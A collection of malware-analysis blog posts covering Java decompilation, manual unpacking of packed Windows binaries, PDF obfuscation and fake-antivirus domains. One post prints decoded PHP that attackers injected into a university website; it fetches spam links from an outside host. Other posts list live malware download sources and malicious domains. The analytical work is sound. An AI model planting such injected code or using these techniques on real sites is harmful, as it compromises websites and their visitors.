Java Malware: Java Decompilers for JAR Malware Analysis

Krakatau comes with three tools, an assembler, disassembler and a decompiler.
From the author of Krakatau, Robert Grosse
        " The Krakatau decompiler takes a different approach to most Java decompilers.
         It can be thought of more as a compiler whose input language is Java bytecode
         and whose target language happens to be Java source code. Krakatau takes in
         arbitrary bytecode, and attempts to transform it to equivalent Java code. This
         makes it robust to minor obfuscation, though it has the drawback of not
         reconstructing the "original" source, leading to less readable output than a
         pattern matching decompiler would produce for unobfuscated Java classes." 

decompile.py can extract class files from a .jar file and decompiles the extracted .class file to Java code (.java). Below command decompiles .class file to .java file and places the file in praveendecompile directory.
$ python decompile.py -path . hello.class -out praveendecompile/

Dissecting the command
$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar
-out        output directory
-path      path to core language classes, directories etc
-skip      continue upon errors

$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar
Krakatau  Copyright (C) 2012-14  Robert Grosse
This program is provided as open source under the GNU General Public License.
See LICENSE.TXT for more details.
Attempting to automatically locate the standard library...
Found at  /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/lib/rt.jar
processing target plugins/Server, 2 remaining
Loading plugins/Server
Loading java/lang/Object
Loading java/lang/Throwable
Loading java/io/Serializable
Loading java/lang/IllegalMonitorStateException
Loading java/lang/RuntimeException
Loading java/lang/Exception
Decompiling method ()V
Decompiling method onLine ()V
Decompiling method offLine ()V
Decompiling method getId ()Ljava/lang/String;
Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/plugins/Server.java
0.369355201721  seconds elapsed
processing target Main, 1 remaining
Loading Main
Loading java/lang/ClassLoader
Loading java/io/InputStream
Loading java/io/Closeable
Loading java/lang/AutoCloseable
Loading java/io/ByteArrayInputStream
Loading java/io/PrintStream
Loading java/io/FilterOutputStream
Loading java/io/OutputStream
Loading java/io/Flushable
Loading java/lang/Appendable
Loading java/lang/String
Loading java/lang/Comparable
Loading java/lang/CharSequence
Loading java/util/jar/JarInputStream
Loading java/util/zip/ZipInputStream
Loading java/util/zip/InflaterInputStream
Loading java/io/FilterInputStream
Loading java/util/zip/ZipConstants
Loading java/lang/OutOfMemoryError
Loading java/lang/VirtualMachineError
Loading java/lang/Error
Decompiling method iiIiiiiiii ([BLjava/lang/String;)Ljava/util/jar/JarInputStream;
Loading java/util/HashMap
Loading java/util/AbstractMap
Loading java/util/Map
Loading java/lang/Cloneable
Loading java/lang/ClassCastException
Loading java/lang/NullPointerException
Decompiling method getResourceAsStream (Ljava/lang/String;)Ljava/io/InputStream;
Loading java/util/jar/JarEntry
Loading java/util/zip/ZipEntry
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarEntry;)Ljava/lang/String;
Loading java/lang/ClassNotFoundException
Loading java/lang/ReflectiveOperationException
Loading java/lang/Class
Loading java/lang/reflect/GenericDeclaration
Loading java/lang/reflect/Type
Loading java/lang/reflect/AnnotatedElement
Decompiling method findClass (Ljava/lang/String;)Ljava/lang/Class;
Decompiling method iiIiiiiiii (Ljava/util/jar/JarInputStream;)V
Loading java/io/ByteArrayOutputStream
Decompiling method ()V
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarInputStream;)Ljava/util/jar/JarEntry;
Decompiling method iiIiiiiiii ()V
Loading java/lang/StackTraceElement
Loading java/lang/StringBuffer
Loading java/lang/AbstractStringBuilder
Loading java/lang/ArrayIndexOutOfBoundsException
Loading java/lang/IndexOutOfBoundsException
Loading java/lang/NegativeArraySizeException
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;)Ljava/lang/String;
Loading java/lang/reflect/Method
Loading java/lang/reflect/AccessibleObject
Loading java/lang/reflect/Member
Decompiling method main ([Ljava/lang/String;)V
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;[B)Ljava/lang/Class;
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ()Ljava/io/InputStream;
Loading java/io/Reader
Loading java/lang/Readable
Loading java/io/InputStreamReader
Loading java/io/BufferedReader
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/InputStream;)Ljava/lang/String;
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/ByteArrayOutputStream;)[B
Decompiling method loadClass (Ljava/lang/String;)Ljava/lang/Class;
Loading java/lang/StringBuilder
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ([BLjava/lang/String;)[B
Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/Main.java
15.0299580097  seconds elapsed
*********************************************************
Highlighted the importand parts of the decompilation

Above decompilation creates couple of files under temp_praveen directory
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau/temp_praveen$
$ ls -R
Main.java  plugins
./plugins:
Server.java

Rename 2f8d204b747ed971a8bc8927b2e0898c.jar to 2f8d204b747ed971a8bc8927b2e0898c.zip and unzip the zip file (unzip on .jar file might work, did not try though)

praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$

$ unzip 2f8d204b747ed971a8bc8927b2e0898c.zip 

Archive:  2f8d204b747ed971a8bc8927b2e0898c.zip

  inflating: META-INF/MANIFEST.MF    

  inflating: MANIFEST.MF             

  inflating: ID                      

  inflating: plugins/Server.class    

  inflating: Main.class              

praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$

disassemble.py takes class or jar file as input and converts it to assembly language format and the output can be reassembled. The ouput is saved into .j file. If jar file is input it disassembles all the class files part of jar into .j files.
python disassemble.py Main.class

$ python ../disassemble.py Main.class 
processing target Main.class, 1/1 remaining
Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/Main.j
0.280933856964  seconds elapsed

javap binary is included with the JDK installation. javap can be used to see the bytecode of a class

$javap -c Main.class 

assemble.py is used to convert byte code(.j) to class file. JVM class file format
python assemble.py Main.j

$ python ../../assemble.py Server.j
Processing file Server.j, 1/1 remaining
Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/plugins/Server.class

Java malware might use different obfuscation techniques to make it difficult for Malware Analyst and detection devices.Errors encountered while decompilation might need to be fixed manually.

http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html
http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau
https://github.com/Storyyeller/Krakatau/blob/master/README.TXT
https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt

Manual Unpacking of Compressed Binaries

INTRODUCTION

In this article we will walk through manual unpacking of protected malicious Windows binaries using OllyDBG. We also need to rebuild Import Address Table (IAT) to restore the file to executable state. Most of the Anti-virus (AV) vendors flag PE packers as malicious software. There are many varieties of packer’s available, say, ASpcak, UPX, NsPack, Armadillo, Themida etc.

PACKERS

Packers reduce the physical size of an executable by compressing an executable and combine the compressed data with decompression stub into a single binary. At runtime, the decompression stub expands the original application and transfers control to the original entry point (OEP).

One of the methods that can be used to locate the original entry point (OEP) of the file is to apply break points on the following APIs:

GetLoadLibraryA

GetVersionExA

GetEnvironmentA

LoadLibraryA

GetProcAddress

IniHeap

These APIs are called by the packer’s start-up routine.

Following articles explain manual unpacking of UPX and AHpack

http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

http://blog.disects.com/2013/12/manual-unpacking-of-ahpack01.html

  

REFERENCES

http://en.wikipedia.org/wiki/Executable_compression

http://www.virusbtn.com/virusbulletin/archive/2012/04/vb201204-manual-unpacking.dkb

https://www.sans.org/reading-room/whitepapers/malicious/packer-analysis-report-debugging-unpacking-nspack-34-37-packer-33428

Windows API's used by Malware

Below Windows API's are frequently used by Malware, though this is not an exhaustive list.

Anti-debugging Techniques
kerne32.CloseHandle
kernel32.GetTickCount
the byte at offset 0x02(IsDebugged) in the PEB is set(debugged) or not
Check for the NtGlobalFlags at offset 0x68 in the PEB

kernel32.GetProcAdddress
kernel32.LoadLibraryA
kernel32.OpenProcess - get handle of a given process
kernel32.VirutalAllocEx - reserves within the virtual address space of a process
kernel32.CreateRemoteThread - create Thread (inside a process)

FindResource
LockResource
ShellExecute
GetThreadContext
CreateProcessA
ReadProcessMemory
WriteProcessMemory
NtQueueApcThread
CreateToolhelp32Snapshot
Thread32First
Thread32Next
SetWindowsHookEx
NtSetSystemInformation
CreateFile

File handling functions
Registry handling function
Network communication API's

Tutorial for learning Malware analysis
https://noppa.aalto.fi/noppa/kurssi/t-110.6220/luennot

Manual Unpacking of UPX Packed Binary File

FileName: calc.exe
MD5: 829e4805b0e12b383ee09abdc9e2dc3c
File Size: 114688
Source: C:\WINDOWS\system32
OS Used: Windows XP Pro SP3 (English)

Create UPX Packed binary using below command
upx -9 -o calc_upx9.exe calc.exe

File Size after packing is 57856 bytes

Packer Info

Lets start unpacking, load the file to OllyDBG. OllyDBG detects and warns about the Packer, ignore the message (click NO).

0x01020250  is the current Entry Point

01020250  60               PUSHAD

Real OEP = OEP find in Olly - Image Base

Real OEP = 0x01020250 - 0x01000000

After ignoring the warning, step over (F8) POPAD, right click on ESP(0x0006FFA4) and follow in dump.

POPAD will push all the REGISTERs values onto Stack.

In the dump window select first 2/4 bytes and go for a hardware breakpoint on access as shown below. First 4 bytes selected is the value of EDI Register on Stack in little endian format.

Run the binary (F9) after setting the breakpoint, will stop execution when hits a break point (0x010203CE). When breakpoint is hit the CPU is

010203CD   61               POPAD

010203CE   8D4424 80        LEA EAX,DWORD PTR SS:[ESP-80]

010203D2   6A 00            PUSH 0

010203D4   39C4             CMP ESP,EAX

010203D6  ^75 FA            JNZ SHORT calc_upx.010203D2

010203D8   83EC 80          SUB ESP,-80

010203DB  -E9 9520FFFF      JMP calc_upx.01012475

Put a breakpoint at 0x010203DB (first JUMP instruction after POPAD), press F9 and when we hit the breakpoint single step (F8) one time from JUMP, will land at

01012475   6A 70            PUSH 70

01012477   68 E0150001      PUSH calc_upx.010015E0

Right click on 0x01012475 and "Dump debugged process", copy the value in Modify text box which will be our OEP and  click on Dump button which will create a new binary (dump_test.exe here).

dump_test.exe is not executable since it doesn't have proper Import Address Table (IAT). Executing the binary will throw below error

Load the original binary (calc.exe) into ImportREC, paste the OEP copied from Modify text field when creating dump file. Click on AutoSearch to automatically search IAT's. Will give below log message

Original IAT RVA found at: 0000120C in Section RVA: 00001000 Size:00018000

Now click on GetImports which will throw below log if everything goes fine.

IAT read successfully.

------------------------------------------------

Current imports:

6 (decimal:6) valid module(s) (added: +6 (decimal:+6))

84 (decimal:132) imported function(s). (added: +84 (decimal:+132))

Now click on FixDump and select  dump_test.exe, ImportREC will fix dump_test.exe and creata a new file dump_test_.exe, see below logs

*** New section added successfully. RVA:00029000 SIZE:00001000

Image Import Descriptor size: 78; Total length: 908

C:\Documents and Settings\praveen\Desktop\UnpackMe\upx_calc\dump_test_.exe saved successfully.

To cross verify load the newly created file into PEiD

Done :-) !!! 

Manual unpacking of AHpack can be found at

http://blog.disects.com/2013/12/manual-unpacking-of-ahpack01.html

Manual Unpacking of AHpack(0.1) Packed Binary File

File Information
FileName: UnPackMe_!EP(EXE Pack)1.2.exe
MD5: c39d13643796db07eb9c3c90b3db71d0
File Size: 281088
Source: tuts4u
OS Used: Windows XP Pro SP3 (English)

Packer Information
Packer details can be found using tool "Detect It Easy".

Packed Binary Entry Point

Launch the binary in Debugger, I am using Immunity Debugger v1.85. Immunity will alert you stating that the binary might be Compressed, ignore the error message(click NO) and proceed further. We can see the Entry Point as

Address        Opcode       Instruction
0046B0FF    60               PUSHAD

PUSHAD

Step Into(F7) or Step Over(F8) PUSHAD instruction. PUSHAD willl push the values of all the General Purpose Registers to Stack, except EIP.

Hardware Breakpoint On Access

Right click on ESP(0x0012FFA4) register and click on "Follow in Dump", in the dump window select initial 2 or 4 bytes, right click "Breakpoint-> Hardware, on access->;Dword (click on it)". Will create a Hardware breakpoint.

We can also execute "hr esp-4" and command bar to set Breakpoint.
"Follow in Dump" will show little endian style register values (EDI might be the first value) on top of the stack.

0046B299   61                          POPAD
0046B29A   BA B0714200      MOV EDX,UnPackMe.004271B0
0046B29F  -FFE2                    JMP EDX                                  ; UnPackMe.004271B0

Hits Breakpoint

Execute the binary i.e. hit F9 key. This should break at one instruction after POPAD. Why break here? Because a POPAD was executed before, this will try to access the memory marked with a breakpoint. Single step (F7) till you execute first jump instruction (at 0x0046B29F) which will actually take us to OEP and continue single stepping till we see below instructions which shows the creation of stack frame.

004271B0   55               PUSH EBP

004271B1   8BEC             MOV EBP,ESP

0x004271B0 is the Original Entry Point. Long jump from 0x0046B29F to 0x004271B0, it's fairly tellable that we have reached OEP.

Dump the process by right clicking at 0x004271B0   (PUSH EBP).

Dump Process

Will pop up a window as shown, click on Dump and save it as dump.exe. Executing this file might throw "...not a valid Win32 Application" error because it doesn't have valid Import Address Table(IAT).

Fix Dumped Process
Image Base + OEP = Start Offset
Let's fix the IAT, fire "Import REC" tool and select the original binary which we are trying to Unpack. Modify the OEP to 0x000271B0 and click on AutoSearch tab, ignore the pop warning (click OK).
IAT AutoSearch feature is used to find right references to the API calls. Click on "Get Imports" to get Imports, should not have any errors(see below snapshot).

Now click on "Fix Dump" and provide dump.exe created from one of the steps above. If successful, will create an unpacked binary dump_.exe.

Execute the binary by double clicking it, if it executes without error; boom, our unpacking is done !!

The steps can be summarized as

• Execution starts from new Original Entry Point (OEP) newly added code section located at the end of binary)
• Saves the current Registers Status using PUSHAD (Opcode 60) instruction
• All the Packed Sections are Unpacked in memory
• Resolve the import table of original executable file.
• Restore the original Register Status using POPAD (Opcode 61) instruction
• Finally Jumps to Original Entry point to begin the actual execution

Mac OS X Infector and Research Resources/Links

These are the links/resources collected by one of my friends Sandeep for his research purposes, shared with me. Most of it is worth the read. Hope this helps someone somewhere gain some knowledge........ !!!


HTE -- File manipulator
http://hte.sourceforge.net/

Mach-O filetype and infection methods
http://felinemenace.org/~nemo/slides/mach-o_infection.ppt

Same idea, different author
http://vx.netlux.org/lib/vrg01.html

Method Swizzling (you can remap the function name pointer to binary code mapping on OS-X)
http://www.cocoadev.com/index.pl?MethodSwizzling

Class Posing!
http://www.cocoadev.com/index.pl?ClassPosing
http://www.stepwise.com/Articles/Technical/PosersAndCategories/index.html

OS-X Tools:
otool -- Object File Displaying Tool http://developer.apple.com/mac/library/documentation/Darwin/Reference/ManPages/man1/otool.1.html

gdb -- GNU Debugger (part of GCC)
http://developer.apple.com/tools/gcc_overview.html

gas -- host spoofing manager
http://www.apple.com/downloads/macosx/development_tools/gasmask.html

libtool -- Create Libraries
http://developer.apple.com/mac/library/documentation/Darwin/Reference/ManPages/man1/libtool.1.html

file -- File Typer
http://linux.die.net/man/1/file

ktrace -- Kernel Trace Logging for a process
System Calls, Name Translations, Signal Processing, I/O

dtrace -- Debugger/Tracer in 10.5+
http://www.mactech.com/articles/mactech/Vol.23/23.11/ExploringLeopardwithDTrace/index.html

http://www.macosxhints.com/article.php?story=20071031121823710

kdump -- Kernel Dump Reader

class-dump -- Examines Objective-C Runtime data for MachO files.
http://codethecode.com/projects/class-dump/

Summary of other useful tools:
http://osxbook.com/book/bonus/ancient/whatismacosx/tools.html


Other interesting links are most welcome. I can update the post if there are any interesting links.

URL's to Learn Malware Analysis, RCE

Following links will be pretty useful to learn Malware Analysis, Reverse Code Engineering(RCE) etc.

http://forum.tuts4you.com/index.php
http://www.woodmann.com/TiGa/idaseries.html
http://www.openrce.org/articles/
http://www.kernelmode.info/forum/index.php
http://crackmes.de/

Debugging Book
http://advancedwindowsdebugging.com/portal/portal_downloads.htm


Step 1: Learn C/C++/Delphi etc. You can't reverse engineer if you can't forward engineer.
Step 2: Learn x86 assembly - http://opensecuritytraining.info/IntroX86.html (includes videos)
Step 3: Learn x86 architecture - http://opensecuritytraining.info/IntermediateX86.html (includes videos)
Step 4: Learn PE binary format - http://opensecuritytraining.info/LifeOfBinaries.html (includes videos)
Step 5: Learn about IDA & general RE thought process - http://opensecuritytraining.info/IntroductionToReverseEngineering.html (video pending)
Step 6: Learn about some stealth malware techniques - http://opensecuritytraining.info/Rootkits.html (includes videos)
Step 7: Learn more by encouraging other people to submit their own class material - http://opensecuritytraining.info/Why.html
http://opensecuritytraining.info/Training.html

check it out: http://www.accessroot.com/arteam/site/news.php
another awesome tuts: http://portal.b-at-s.net/download.php

Some Sites
http://j00ru.vexillium.org/
http://www.analyze-v.com/
http://byteworm.com/
http://blog.zemana.com/2012/05/kaynaklar.html
http://fumalwareanalysis.blogspot.in/p/malware-analysis-tutorials-reverse.html
http://thelegendofrandom.com/blog/sample-page
http://beginners.re/

Live Malware Samples
http://www.offensivecomputing.net/
http://www.malwaredomainlist.com/
http://www.malc0de.org/database
http://www.virussign.com/index.html
http://www.vx.netlux.org/
http://openmalware.org/
http://virusshare.com/
https://twitter.com/MalwareChannel 
http://www.vxheavens.com/
http://malshare.com/
https://avcaesar.malware.lu/
http://www.malwareblacklist.com/showMDL.php
https://malwr.com/
http://secuboxlabs.fr/
http://www.virusign.com/
http://virusshare.com/

Other useful sources
http://zeltser.com/combating-malicious-software/malware-sample-sources.html
http://reverseengineering.stackexchange.com/questions/206/where-can-i-as-an-individual-get-malware-samples-to-analyze
http://reverseengineering.stackexchange.com/questions/265/where-to-find-free-training-in-reverse-engineering

Suspicious files can be analyzed at
https://www.virustotal.com/

Malicious PDF Files
http://filex.jeek.org/archive_PDF.zip

Android Malware Samples
http://contagiodump.blogspot.in/
http://www.malgenomeproject.org/

For Mac OS X related resources, refer
http://darshanams.blogspot.in/2012/05/mac-os-x-infector-and-research.html

Tools
IDA/Olly/WinDBG
ImpREC
LordPE
Sysinternal's Tool Suite
Exeinfo PE/ PEiD
PEstudio
CFF Explorer
FileAlyzer
PEview

Let me know new sites, will update the same here :-) !!!

Malicious PDF: Portable Document Files Compresion/Encoding/Obfuscation

Malicious PDF's has increased manifold which are used to infect computers with Malware of execute code when PDF files are opened. We will see various ways how javascript embedded within PDF's can be compressed or encoded to evade detection by IDS/IPS and Anti Virus. Normally many PDF Parsers crash while analyzing the malicious/malformed file but Adobe reader successfully opens the file which leads to infection.

Below is the malicious PDF file viewed in text editor.

PDF Parsers might have issues in analyzing following abnormal files:

1. Portable Document File Format does not strictly abide to its specification.

2. PDF Version might be malformed (NULL value, incomplete value etc) (can see in above pic)

3. May not contain endobj or endstream (atleast one string should be present within an object)

4. May not contain xref table

5. Names may be Encoded (/JavaScript as /J#61vaScript).

6. No %%EOF header

7. There might be multiple %%EOF headers or trailer’s  indicating incremental updates.

8. PDF embedded within other PDF (same object numbers in a single file).

9. Different types of Evasions/ Encoding can be found at

   http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

Different Encoding/Compressions Filter types are

/FlateDecode

/ASCIIHexDecode

/ASCII85Decode

/JBIG2Decode

/LZWDecode

/RunLengthDecode

/SCIIHexDecode, 

/CCITTFaxDecode

/DCTDecode

/JPXDecode

This might not be the full list of Filters (not sure) .

Below snapshot shows highly obfuscated  PDF file

Good articles related to PDF's can be found at

http://blog.didierstevens.com/category/pdf/
http://www.decalage.info/file_formats_security/pdf

http://code.google.com/p/corkami/wiki/PDFTricks

For quick analysis of a PDF file you can upload to
http://wepawet.cs.ucsb.edu/

Live malicious PDF files can be found at
http://filex.jeek.org/archive_PDF.zip
Please do not open files in the archive with any of the PDF readers.

Following articles might be of your interest
http://darshanams.blogspot.in/2012/05/cain-and-abel-password-cracking.html
http://darshanams.blogspot.in/2010/09/forensics-1-extracting-image.html
http://darshanams.blogspot.in/2011/05/snort-logging-alerts-to-syslog-server.html

Comments are most welcome :) !!!

Premier University of Andhra Pradesh Serving Malware.

Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit http://www.nagarjunauniversity.ac.in/, Firefox browser alarms you with the following warning

Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link

Google description about the pages hosted by www.nagarjunauniversity.ac.in is

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.


Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*

Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script

error_reporting(0);
$links = new GetLinks();

echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";


var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";

function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}

function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {

} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

I typed my search keywords into Google and clicked on few links on the first page of results. One site interested me because it was redirecting me to some other site, the malicious web page whic is redirecting to new page was embedded with unnoticeable flash file named intro.swf. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all malicious domains.

If we click OK or Cross(X)/Close button it will take us to fake scanning page depicting real Anti -virus scanning of the PC.
After the scanning it gives the scan results as shown in figure below depicting a real Anti-Virus scan stating various directories on the PC are infected with trojans.
Asks the users to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page will give a pop-up window to download Anti-virus binary.
If we click on the page for multiple times it will pop-up multiple windows for downloading
Antivirus-[a-f0-9]{3,7}_2031.exe file.If we do "View Source" on above page it will show few interesting javascript files.
Contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc extensions.
I downloaded different binary files samples but all the files had same MD5 value. Surprising !!!
Tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on VM. Is it detecting VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but not able to run the sample successfully.
Don't try to access domains with URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

sess parameter is changing with every malicious domain. I was littile suspicious with the sess parameters value for base64 encoding, decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP Address.

Malicious Domains: hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

• File is Packed with unknown packer.
• PEiD doesn't give any packer name.
• OllyDBG throws exception while loading the file.
• Imports few APIs from KERNEL32.DLL

Virustotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I successfully run the malicious file then I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!